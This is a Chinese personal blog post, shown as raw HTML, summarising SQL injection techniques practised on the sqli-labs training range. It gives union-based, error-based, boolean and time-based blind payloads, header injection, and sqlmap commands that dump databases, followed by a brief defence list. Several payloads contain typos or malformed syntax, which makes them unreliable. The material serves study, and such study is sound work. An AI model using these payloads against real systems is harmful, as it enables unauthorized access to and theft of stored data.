<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>Web安全-sql注入总结 | 雨夜的博客</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  
  
  
  <meta name="description" content="一、简介了解SQL注入原理：我都理解是，用户把不合法的语句通过web提交的方式带到数据库中执行(SQL语句)，不按照设计者的设计思维进行数据查询，从而获得自己想要的数据。web的提交方式为表单、输入域名、页面请求。 危害：sql注入一直是高危漏洞，它可以获取敏感信息、修改信息、脱裤、上传webshell等。 附带上我哥们的所写的原理：  SQL注入即是指web应用程序对用户输入数据的合法性没有判断">
<meta property="og:type" content="article">
<meta property="og:title" content="Web安全-sql注入总结">
<meta property="og:url" content="http://yoursite.com/2020/04/16/Web%E5%AE%89%E5%85%A8-sql%E6%B3%A8%E5%85%A5%E6%80%BB%E7%BB%93/index.html">
<meta property="og:site_name" content="雨夜的博客">
<meta property="og:description" content="一、简介了解SQL注入原理：我都理解是，用户把不合法的语句通过web提交的方式带到数据库中执行(SQL语句)，不按照设计者的设计思维进行数据查询，从而获得自己想要的数据。web的提交方式为表单、输入域名、页面请求。 危害：sql注入一直是高危漏洞，它可以获取敏感信息、修改信息、脱裤、上传webshell等。 附带上我哥们的所写的原理：  SQL注入即是指web应用程序对用户输入数据的合法性没有判断">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="c:%5CUsers%5C%E9%9B%A8%E5%A4%9C%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20200416104915719.png">
<meta property="og:image" content="c:%5CUsers%5C%E9%9B%A8%E5%A4%9C%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20200416105216144.png">
<meta property="og:image" content="c:%5CUsers%5C%E9%9B%A8%E5%A4%9C%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20200416105413343.png">
<meta property="og:image" content="c:%5CUsers%5C%E9%9B%A8%E5%A4%9C%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20200416110845047.png">
<meta property="og:image" content="c:%5CUsers%5C%E9%9B%A8%E5%A4%9C%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20200416145121853.png">
<meta property="og:image" content="c:%5CUsers%5C%E9%9B%A8%E5%A4%9C%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20200416145815244.png">
<meta property="og:image" content="c:%5CUsers%5C%E9%9B%A8%E5%A4%9C%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20200416164432386.png">
<meta property="og:image" content="c:%5CUsers%5C%E9%9B%A8%E5%A4%9C%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20200416164550586.png">
<meta property="og:image" content="c:%5CUsers%5C%E9%9B%A8%E5%A4%9C%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20200416165119842.png">
<meta property="og:image" content="c:%5CUsers%5C%E9%9B%A8%E5%A4%9C%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20200416170440364.png">
<meta property="article:published_time" content="2020-04-16T00:46:00.000Z">
<meta property="article:modified_time" content="2020-04-16T09:28:40.644Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="c:%5CUsers%5C%E9%9B%A8%E5%A4%9C%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20200416104915719.png">
  
    <link rel="alternate" href="/atom.xml" title="雨夜的博客" type="application/atom+xml">
  
  
    <link rel="icon" href="/images/default-avatar.jpg">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/css/style.css">

  
<link rel="stylesheet" href="/css/highlight.css">

<meta name="generator" content="Hexo 4.2.0"></head>

<body>
  <div id="fullpage" class="mobile-nav-left">
    
      <div id="wrapper" title="欢迎您！">
    
    
      <header id="header">
  <div id="nav-toggle" class="nav-toggle"></div>
  <div class="head-box global-width">
    <nav class="nav-box nav-left">
      
        <a class="nav-item" href="/" title
        
        >首页</a>
      
        <a class="nav-item" href="/archives" title
        
        >归档</a>
      
    </nav>
  </div>
</header>
      <div id="middlecontent" title class="global-width sidebar-left">
        <section id="main"><article id="post-Web安全-sql注入总结" class="article global-container article-type-post" itemscope itemprop="blogPost">
  
    <header class="article-header">
      
  
    <h1 class="article-title" itemprop="name">
      Web安全-sql注入总结
    </h1>
  

    </header>
  
  <div class="article-meta">
    <a href="/2020/04/16/Web%E5%AE%89%E5%85%A8-sql%E6%B3%A8%E5%85%A5%E6%80%BB%E7%BB%93/" class="article-date">
  <time datetime="2020-04-16T00:46:00.000Z" itemprop="datePublished">2020-04-16</time>
</a>
    
    
  </div>
  
    <span id="busuanzi_container_page_pv">
      本文总阅读量<span id="busuanzi_value_page_pv"></span>次
    </span>
  

  <div class="article-inner">
    
    <div class="article-content article-content-cloud" itemprop="articleBody">
      
        <h2 id="一、简介"><a href="#一、简介" class="headerlink" title="一、简介"></a>一、简介</h2><h3 id="了解SQL注入"><a href="#了解SQL注入" class="headerlink" title="了解SQL注入"></a>了解SQL注入</h3><p>原理：我都理解是，用户把不合法的语句通过web提交的方式带到数据库中执行(SQL语句)，不按照设计者的设计思维进行数据查询，从而获得自己想要的数据。web的提交方式为表单、输入域名、页面请求。</p>
<p>危害：sql注入一直是高危漏洞，它可以获取敏感信息、修改信息、脱裤、上传webshell等。</p>
<p>附带上我哥们的所写的原理：</p>
<blockquote>
<p>SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严，攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句，在管理员不知情的情况下实现非法操作，以此来实现欺骗数据库服务器执行非授权的任意查询，从而进一步得到相应的数据信息。</p>
<p>没有对用户的输入输出进行安全过滤，导致后台直接将用户的输入作为SQL语句的一部分，执行操作，产生危害</p>
<p>通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。</p>
</blockquote>
<h3 id="注入分类"><a href="#注入分类" class="headerlink" title="注入分类"></a>注入分类</h3><p>按变量类型分：数字型和字符型</p>
<p>按HTTP提交方式分：POST注入、GET注入和Cookie注入</p>
<p>按注入方式分：布尔注入、联合注入、多语句注入、报错注入、延时注入、内联注入</p>
<h2 id="二、基本的注入流程"><a href="#二、基本的注入流程" class="headerlink" title="二、基本的注入流程"></a>二、基本的注入流程</h2><h3 id="基本语句"><a href="#基本语句" class="headerlink" title="基本语句"></a>基本语句</h3><p>最常用的查询语句无非就是：</p>
<div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">查表selcet table_name from information_schema.tables where table_schema&#x3D;database()</span><br><span class="line">查库select column_name from information_schema.columns where culomn_schema&#x3D;表 and table_schema&#x3D;database()</span><br></pre></td></tr></table></figure></div>

<h3 id="手工注入"><a href="#手工注入" class="headerlink" title="手工注入"></a>手工注入</h3><p>大部分以sqli-labs靶场为例，可能会结合CTF例题</p>
<p>判断注入点：进行闭合，判断是数字型还是字符型，通常都是单双引号和括号。</p>
<p>注释：一般我都是用 –+来注释  注意：DVWA靶场要用#来注释</p>
<p>判断字段：  order by  5   （利用半分法来做）</p>
<p><img src="C:%5CUsers%5C%E9%9B%A8%E5%A4%9C%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20200416104915719.png" alt="image-20200416104915719"></p>
<p>查看可回显字段：</p>
<div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and 1&#x3D;2 union select 1,2,3--+   &#x2F;&#x2F;and 1&#x3D;2 条件为假，，显示出可回显字段</span><br></pre></td></tr></table></figure></div>

<p><img src="C:%5CUsers%5C%E9%9B%A8%E5%A4%9C%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20200416105216144.png" alt="image-20200416105216144"></p>
<p>知道可显字段后，收集一些数据库的信息，版本号、用户等。</p>
<p><img src="C:%5CUsers%5C%E9%9B%A8%E5%A4%9C%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20200416105413343.png" alt="image-20200416105413343"></p>
<div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">查看当前数据库database（）   用户 user（）</span><br><span class="line">版本号 version（）</span><br></pre></td></tr></table></figure></div>

<p>下一步就该查表了 这里要用到group_concat这个函数，用法可以参考一下手册</p>
<div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and 1&#x3D;2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema&#x3D;database()--</span><br></pre></td></tr></table></figure></div>

<p><img src="C:%5CUsers%5C%E9%9B%A8%E5%A4%9C%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20200416110845047.png" alt="image-20200416110845047"></p>
<div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">查字段 and 1&#x3D;2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name&#x3D;&#39;users&#39; and table_schema&#x3D;database()--+</span><br></pre></td></tr></table></figure></div>

<p><img src="C:%5CUsers%5C%E9%9B%A8%E5%A4%9C%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20200416145121853.png" alt="image-20200416145121853"></p>
<div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">查字段  union select 1，group_concat(username),group_concat(password) from users--+</span><br></pre></td></tr></table></figure></div>

<p><img src="C:%5CUsers%5C%E9%9B%A8%E5%A4%9C%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20200416145815244.png" alt="image-20200416145815244"></p>
<h3 id="宽字节"><a href="#宽字节" class="headerlink" title="宽字节"></a>宽字节</h3><p>数据库大多数为GBK才可以，是由编码在转码的时候导致的。</p>
<div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1%df&#39; and 1&#x3D;1   1%bb&#39; and 1&#x3D;1</span><br></pre></td></tr></table></figure></div>

<h3 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h3><p>报错注入简单理解就是利用错的数据带出你想要的数据</p>
<p>如果有兴趣可以读一下《代码审计——企业级web代码审计安全架构》上面写了10中方法，其他两种网上收集，其中用的最多的是前三种</p>
<p>floor报错,注入语句如下:<br>and (select 1 from (select count(<em>),concat((payload),floor (rand(0)</em>2))x from information_schema.tables group by x)a)</p>
<p>ExtractValue报错,注入语句如下:<br> and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));</p>
<p>UpdateXml报错,注入语句如下:<br> and 1=(updatexml(1,concat(0x3a,(select user())),1))</p>
<p>NAME_CONST报错,注入语句如下:<br> and exists(select<em>from (select</em>from(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c)</p>
<p>join报错,注入语句如下:<br> select * from(select * from mysql.user ajoin mysql.user b)c;</p>
<p>exp报错,注入语句如下:<br> and exp(~(select * from (select user () ) a) );</p>
<p>GeometryCollection()报错,注入语句如下:<br> and GeometryCollection((select *from(select from(select user () )a)b ));</p>
<p>polygon ()报错,注入语句如下:<br> and polygon (()select * from(select user ())a)b );</p>
<p>multipoint ()报错,注入语句如下:<br> and multipoint (()select * from(select user() )a)b );</p>
<p>multlinestring ()报错,注入语句如下:<br> and multlinestring (()select * from(select user () )a)b );</p>
<p>multpolygon ()报错,注入语句如下:<br> and multpolygon (()select * from(select user () )a)b );</p>
<p>linestring ()报错,注入语句如下:<br> and linestring (()select * from(select user() )a)b );</p>
<h3 id="盲注"><a href="#盲注" class="headerlink" title="盲注"></a>盲注</h3><p>先介绍几个函数</p>
<p>length()计算数据库长度    substr()截取字符串     ascii()函数</p>
<h4 id="布尔型"><a href="#布尔型" class="headerlink" title="布尔型"></a>布尔型</h4><p>简单理解就是：成功会显示正确内容，失败显示非正常内容。</p>
<p><img src="C:%5CUsers%5C%E9%9B%A8%E5%A4%9C%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20200416164432386.png" alt="image-20200416164432386"></p>
<div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id&#x3D;1&#39;and length(database())&#x3D;8--+    &#x2F;&#x2F;数据库长度为8，可以看一下下面的图参考</span><br></pre></td></tr></table></figure></div>

<p><img src="C:%5CUsers%5C%E9%9B%A8%E5%A4%9C%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20200416164550586.png" alt="image-20200416164550586"></p>
<div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">id&#x3D;1&#39; and(ascii(substr(database(),1,1)))&#x3D;115--+</span><br><span class="line">id&#x3D;1&#39; and(ascii(substr(database(),2,1)))&#x3D;101--+</span><br><span class="line">id&#x3D;1&#39; and(ascii(substr(database(),3,1)))&#x3D;99--+      &#x2F;&#x2F;又能力写脚本，不行用Burp</span><br></pre></td></tr></table></figure></div>

<p><img src="C:%5CUsers%5C%E9%9B%A8%E5%A4%9C%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20200416165119842.png" alt="image-20200416165119842"></p>
<p>接着判断表名了，我把公式写下来大家自己套把</p>
<div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">判断长度and length(payload）&#x3D;8--+</span><br><span class="line">猜库表  and(ascii(substr(payload,1,1)))&#x3D;ascii值--+   &#x2F;&#x2F;这里用基本语句猜</span><br></pre></td></tr></table></figure></div>

<h4 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a>时间盲注</h4><p>时间盲注判断也就是根据返回时间进行判断，常用的sleep函数和if语句</p>
<div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">判断：&#39;and if(1 &#x3D;0,1,sleep(5)) --+</span><br><span class="line">      and sleep（5）--+</span><br></pre></td></tr></table></figure></div>

<p><img src="C:%5CUsers%5C%E9%9B%A8%E5%A4%9C%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20200416170440364.png" alt="image-20200416170440364"></p>
<div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">判断库：and if(length(database())&#x3D;长度,sleep(10),1)--+</span><br><span class="line">判断数据 and if(ascii(substr(database(),1,1))&#x3D;115,slepp(10),1)--+ </span><br><span class="line">跟上面基本一样，就是利用if语句和sleep函数   &#x2F;&#x2F;sleep设置3到5秒即可，不要太长</span><br></pre></td></tr></table></figure></div>

<h3 id="cookie、XFF、User-Agent注入"><a href="#cookie、XFF、User-Agent注入" class="headerlink" title="cookie、XFF、User-Agent注入"></a>cookie、XFF、User-Agent注入</h3><p>这些注入需要利用burp抓包</p>
<div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">X-Forward-For：127.0.0.1&#39; select 1,2,user()</span><br></pre></td></tr></table></figure></div>

<h3 id="内联注入"><a href="#内联注入" class="headerlink" title="内联注入"></a>内联注入</h3><div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">举例：id&#x3D;-1 &#x2F;*!UNION*&#x2F; &#x2F;*!SELECT*&#x2F; 1,2,3</span><br><span class="line">&#x2F;&#x2F;利用别名</span><br><span class="line">union select 1,2,3,4,a.id,b.id,* from(sys_admin as a inner join sys_admin as b on a.id&#x3D;b.id)</span><br></pre></td></tr></table></figure></div>

<h3 id="二次注入"><a href="#二次注入" class="headerlink" title="二次注入"></a>二次注入</h3><p>在存入数据库的时候做了过滤，但是取出来的时候没有做过滤，而产生的数据库注入。</p>
<h3 id="其他注入"><a href="#其他注入" class="headerlink" title="其他注入"></a>其他注入</h3><p>还有DNS_log注入、堆叠注入、order by 注入、图片注入等等，我是不想写了。。。</p>
<h2 id="三、最后总结"><a href="#三、最后总结" class="headerlink" title="三、最后总结"></a>三、最后总结</h2><h3 id="sqlmap基本使用"><a href="#sqlmap基本使用" class="headerlink" title="sqlmap基本使用"></a>sqlmap基本使用</h3><div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">基本使用</span><br><span class="line">GET sqlmap -u &quot;url&quot; &#x2F;&#x2F;这个URL必须含？</span><br><span class="line">POST sqlmap -u “url” --data &quot;POST数据&quot;</span><br><span class="line">cookie sqlmap -u &quot;url&quot; --cookie &quot;chsadj&quot; --level 2 &#x2F;&#x2F;这里的URL去掉？及其后的内容，并将它们放在cookie的内容里面</span><br><span class="line">sqlmap.py -url   判断注入点</span><br><span class="line">sqlmap.py -u 地址 --dbs   列出所有库</span><br><span class="line">sqlmap.py -u 地址 -D 库 --tables   列出表</span><br><span class="line">sqlmap.py -u 地址 -D 库 -T 表 --columns    字段</span><br><span class="line">sqlmap.py -u 地址 -D 库 -T 表 -C  字段 --dump  数据</span><br><span class="line">sqlmap.py -m url.txt &#x2F;&#x2F;url</span><br><span class="line">sqlmap.py -r get.txt  &#x2F;&#x2F;HTTP请求</span><br><span class="line">sqlmap.py -u”地址″ –tamper “脚本”</span><br><span class="line">sqlmap.py -u URL –data“username&#x3D;a&amp;password&#x3D;a” &#x2F;&#x2F;指定表单注入</span><br></pre></td></tr></table></figure></div>

<h3 id="SQL防御"><a href="#SQL防御" class="headerlink" title="SQL防御"></a>SQL防御</h3><p>1.对用户输入的内容进行转义</p>
<p>2.限制关键字的输入，如单引号、双引号、右括号等，限制输入的长度</p>
<p>3.使用SQL语句预处理，对SQL语句进行预编译，然后进行参数绑定，最后传入参数</p>
<p>4.添加WAF，防火墙等</p>
<p>写的有点累，我也懒，给大家附带几篇师傅们写的吧</p>
<p><a href="https://xz.aliyun.com/t/6677#toc-14" target="_blank" rel="noopener">https://xz.aliyun.com/t/6677#toc-14</a></p>
<p><a href="https://xz.aliyun.com/t/5878#toc-8" target="_blank" rel="noopener">https://xz.aliyun.com/t/5878#toc-8</a></p>
<p><a href="https://www.cnblogs.com/-chenxs/p/11614129.html" target="_blank" rel="noopener">https://www.cnblogs.com/-chenxs/p/11614129.html</a></p>

      
    </div>
    
      <footer class="article-footer">
        完
      </footer>
    
  </div>
  
    
<nav id="article-nav">
  <div class="article-nav-block">
    
      <a href="/2020/04/16/Web%E5%AE%89%E5%85%A8-%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" id="article-nav-newer" class="article-nav-link-wrap">
        <strong class="article-nav-caption"></strong>
        <div class="article-nav-title">
          
            Web安全-文件包含
          
        </div>
      </a>
    
  </div>
  <div class="article-nav-block">
    
  </div>
</nav>

    <link rel="stylesheet" href="/css/gitment.css"> 
<script src="/js/gitment.js"></script>

<div id="gitmentContainer"></div>

<script>
var gitment = new Gitment({
  owner: '',
  repo: '',
  oauth: {
    client_id: '',
    client_secret: '',
  },
})
gitment.render('gitmentContainer')
</script>

  
  
</article>
</section>
        <aside id="sidebar">
  
    <div class="widget-box">
  <div class="avatar-box">
    <img class="avatar" src="/images/default-avatar.jpg" title="一个雨夜"></img>
    <h3 class="avatar-name">
      
        一个雨夜i
      
    </h3>
    <p class="avatar-slogan">
      若无相欠，怎会相见。
    </p>
  </div>
</div>


  
    

  
    

  
    
  
    
  <div class="widget-box">
    <h3 class="widget-title">归档</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/04/">四月 2020</a></li></ul>
    </div>
  </div>

  
    
  <div class="widget-box">
    <h3 class="widget-title">最新文章</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2020/04/16/Web%E5%AE%89%E5%85%A8-%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/">Web安全-文件包含</a>
          </li>
        
          <li>
            <a href="/2020/04/16/Web%E5%AE%89%E5%85%A8-sql%E6%B3%A8%E5%85%A5%E6%80%BB%E7%BB%93/">Web安全-sql注入总结</a>
          </li>
        
      </ul>
    </div>
  </div>

  
      <div class="widget-box">
    <h3 class="widget-title">友链</h3>
    <div class="widget">
      
        <a style="display: block;" href="http://blog.zerone.org.cn/" title target='_blank'
        >Luoyan</a>
      
        <a style="display: block;" href="http://yabin.zerone.org.cn/" title target='_blank'
        >亚彬</a>
      
    </div>
  </div>

  
</aside>
      </div>
      <footer id="footer">
  <div class="foot-box global-width">
    &copy; 2020 John Doe &nbsp;&nbsp;
    驱动于 <a href="http://hexo.io/" target="_blank">Hexo</a>
    &nbsp;|&nbsp;主题 <a href="https://github.com/yiluyanxia/hexo-theme-antiquity" target="_blank" rel="noopener">antiquity</a>
    <br>
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span id="busuanzi_container_site_pv">不蒜子告之   阁下是第<span id="busuanzi_value_site_pv"></span>个访客</span>
  </div>
</footer>
      <script src="https://code.jquery.com/jquery-2.0.3.min.js"></script>
<script>
if (!window.jQuery) {
var script = document.createElement('script');
script.src = "/js/jquery-2.0.3.min.js";
document.body.write(script);
}
</script>



<script src="/js/script.js"></script>




    </div>
    <nav id="mobile-nav" class="mobile-nav-box">
  <div class="mobile-nav-img mobile-nav-top"></div>
  
    <a href="/" class="mobile-nav-link">首页</a>
  
    <a href="/archives" class="mobile-nav-link">归档</a>
  
  <div class="mobile-nav-img  mobile-nav-bottom"></div>
</nav>    
  </div>
</body>
</html>